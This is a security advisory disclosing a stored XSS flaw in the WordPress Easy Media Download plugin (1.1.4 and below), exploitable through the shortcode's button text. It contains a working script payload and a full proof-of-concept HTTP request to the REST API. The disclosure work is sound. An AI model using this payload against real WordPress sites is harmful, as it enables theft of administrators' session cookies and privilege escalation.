Stored XSS Vulnerability in WordPress Easy Media Download Plugin

WordPress Easy Media Download Plugin version 1.1.4 and below were found to be vulnerable to stored XSS while I was auditing the plugin.

Summary

WordPress Media Download plugn is used to insert a download directly from WordPress post editor without using HTML. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The ‘Button Text’ field in used while posting a file download was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Easy Media Download by naa986 version 1.1.4 and below are affected.

The image below shows our javascript is being executed when the following string is inserted into the post.

[easy_media_download url="http://example.com/wp-content/uploads/file.zip" text="Free Download <script>alert(document.cookie)</script>"]

This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.

Proof of Concept

POST /w/wp-json/wp/v2/posts/186?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 162
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://127.0.0.1
Referer: http://127.0.0.1/w/wp-admin/post.php?post=186&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311
Connection: close

{"id":186,"content":"[easy_media_download url=\"http://example.com/wp-content/uploads/file.zip\" text=\"Free Download <script>alert(document.cookie)</script>\"]"}

Recommendation

All user inputs should be sanitized before publishing the post.